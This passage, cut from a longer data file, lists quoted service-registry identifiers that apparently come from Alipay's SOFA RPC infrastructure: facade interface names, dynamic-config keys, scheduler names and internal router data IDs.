rod.common.service.facade.commonreservation.PriceServicePlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promoplatform_ConfigTaskProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.smileface.SmileFaceService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.164.148.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.linkede.metacenter.common.service.facade.EnvCommonServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.signcontract.FintradeInstSignApplyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.dsrconsole.common.service.facade.GuardianRuleConfigFacade:1.0:mybankguardiandsr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.biz.quake.testsuite.TestSuiteMgmtService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zerox.common.service.facade.EmergencyEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.isv.BenchPromotionConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:arkbaseserverless@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_PSBP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antinvoice.biz.flow.manager.TradeInfoManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditMarketMessageBoxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.72.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitydataproc:name=com.alipay.securitydata.common.service.integration.antq.impl.drm.AntQSendResource.antqRatio_TP_ANTEVENT,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.identity.TenantServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.drm73#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fundmng.common.service.facade.QueryFundFileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.3.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finvirtualta.common.service.facade.fund.FinBusinessSumFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.report.facade.disclose.RccenterDiscReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.operation.OperationInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYJSESSIONID.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.facade.back.AddFriendReqFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumequery.common.service.facade.TradeContactsQueryRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.closeSellByRybCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.accenter.service.facade.api.AccenterTaxSchemaMpManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.123.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insmarketingprod.common.service.facade.mng.offlineservice.InsMktProdOfflineMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaserver.facade.PvSofaService:1.0:base@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:consumeweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.ConstraintManager:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.cachebase.callback.AppxGlobalCacheCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.DeliveryTagGzoneServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@pcshield#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:accenterAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mydds.mservicesinspectDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifeprod.common.service.facade.api.advert.LifeAdmgrQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.college.materialtag.MaterialTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.component.endpoint.sofarest.CompatibilityPrivateService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.oceanbase.obforumcore.service.activity.ActivityGuideFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.elastic.zskynet.zskynetDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmmemberop.common.service.facade.api.UserObjectRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dassmeta.common.service.facade.dds.api.ServiceDispatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1204#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_S_1302#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cscheck.service.facade.api.GqcBizSourceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.adapter.DemoConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PEERPAY#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchservbase.biz.service.dynamiccode.DynamicCodeToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finfundprotocol.common.service.facade.activity.FundSignContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.totalUrlDecodeTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zscale.cluster.service.MasterHeartBeatReceiverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finasmcore.common.service.facade.promo.service.PromoBackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lowercaseFirst:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mytradeprod.common.service.facade.ChainDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FcProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.RoleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.ReceiveIvrReceiptService:1.0:findecision@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:filefactory@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FundConvertConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-almanalysis-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fundMaxPurchaseAmountAdjustCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:membertangram@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.bankcardTairCache.zoneWhiteListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscenter.service.common.facade.UserClosedQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.StatisticInfoConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.merchantdata.facade.MobilecashierErrorCodeFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngEventListener:1.0:mirrormng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.3.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloud.apmonitorcore.common.service.facade.v1.EventRoutingRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayAssetAccessDecisionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gotone.common.service.api.SendMailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.custdecision.service.facade.AppLogFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.play.activity2020.Activity2020QueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.132.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finmobilemarket.common.service.facade.api.OpenResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:approveFastAcceptTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.smartant.SmartAntCSQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.api.LocalCacheManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:rmp_test_task@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.DownloadurlSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:blackbox_file_approval_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.rpc.facade.iothub.CarPaySdkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.midas:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.antcloud.AntCloudUserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:infosec@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcoop.common.service.facade.AssetAccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.shop.BindingShopServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipss.service.facade.api.SreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commandcenter.service.facade.api.LabFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.AppBranchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:lifemock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeadapter.biz.shared.tradeswitch.TradeSwitchManageRepository:1.0:gzoneTradeSwitchManageRepository@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financeprod.fund.facade.api.FundQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.AssetAllocationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FundInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.228.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acoffercenter.common.service.facade.privatecloud.offer.OfferConsultPriceForPCFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.85.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_SECBIANQUE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmvisaprod.common.service.facade.api.VisaReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotbsp.business.facade.merchant.signup.MerchantActivitySignUpInfoFacade:1.0:iotbsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zcif.facade.service.SubjectManager:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fcintclcn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.sd.facade.common.AgdsCreditBehaviorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.graychange.api.GrayChangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.eworkcard.LisaUserInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.speechscene.SpeechOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.transaction.AssetTransListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.173.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.partner.api.PartnerPropertyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.CompanyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardPayCancelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbcateringprod.common.service.facade.serve.api.ShopServeInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@smcp#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.reviseDeleteVouchers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordercore.mrch.common.service.api.event.EventOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_CUSTOMS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchiscore.common.service.facade.operation.OperationTargetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:xunlang_test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gfinvest.facade.api.cust.CustCompanyCombInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openhome.facade.sp.policy.PolicyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compass.common.service.facade.api.CoverDetailServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.172.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.biz.shared.repository.AppointmentFinishDateRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.custcenterprod.integration.aliyun.LyClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA-SCHEDULER-S-S-FRDECISION-SCHEDULER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ismonitor.integration.censor.userinfo.CensorUserClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:quotationcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.common.service.facade.api.MerchantBillQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.recharge.RechargeMessageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.asbi.AsbiWorkflowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.api.EntityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebbatch.service.facade.api.FileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.deposit.api.DepositInstructionExtQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowSupportGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.custdecision.service.querymemberprodlog.facade.QueryMemberProdLogFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finqaunion.common.service.facade.tree.BusinessTreeRelationManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexchange.service.facade.fx.api.ForeignExchangeOrderBatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.system.TodoTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchprod_tagBatchAntProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ibops.common.service.facade.query.UserLimitConsultQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.core.starwish.drm.CoreDrm.cifSocialContactViewUpgrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ck:name=com.alipay.zdal.config.groupCluster.fininfo_finreconSequenceDataSource_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alipaypointcust.biz.rpc.task.AlipayPointTaskApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.gloantrade.common.service.facade.api.account.BillAccountOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.stuff.StuffApplyOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.authcenter.service.facade.IotTokenManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecore.service.deposit.action.DepositUniqueService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:charityprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:zconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_F_MYCHAIN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.zoloz.zhubalipay.general.facade.SimilarListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.IntelligentRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:smcp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.153.235#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inspectcore.common.service.facade.query.PluginDataQuerier:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergwlite.service.facade.spi.MessageReceiveServiceForLdc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkwirelessdataportal.common.service.panda.SectionDataManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mcenter.common.service.facade.mdata.MsgSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yfdwebTBaseCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scardcenter.common.service.facade.OfflinepayOrderLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.facade.api.CardInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kmi.common.service.facade.CreateKeyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.15.223.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.manager.CustomSenManager:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.72.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.deductSwitchRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.hainaprod.common.service.facade.api.abos.AbosContractStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundprod.common.service.facade.product.manage.CustomPortfolioProductManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradecsa.common.service.facade.wufu.WufuCountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clivemng.common.service.facade.api.metadatamng.MetaDataMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.malgo.common.facade.MerchantP2pAlgoConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.agreement.AppAgreementRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchselfop.mrchworkbench.panama.service.component.DataCleanComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.IsvManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecomerchant.facade.staff.StaffQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bmw.coresrv.MiniAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.161.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileic.common.service.facade.product.spi.SecurityProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.LiquidateBillFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:regression@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.irisknet.service.biz.bc.facade.CheckCompliance:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqdataservice.common.service.facade.base.BaseFileUploadRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbrecruit.common.service.facade.recruit.RecruitPlanManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.assets.api.facade.service.TableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.facade.PushDeviceGzoneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.lfc.NewsfeedShareFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.44.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.184.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.45.75.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findecision:name=com.alipay.findecision.common.service.integration.config.ServiceClientConfigResource.promotionMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.v2.tag.facade.TagQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.fc.debittrans.service.facade.cptrans.api.CoupontransManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mcardcenter.common.service.facade.CityOneCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauditcenter.facade.OperationFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecore.service.facade.dishonorCheque.DishonorChequeService:1.0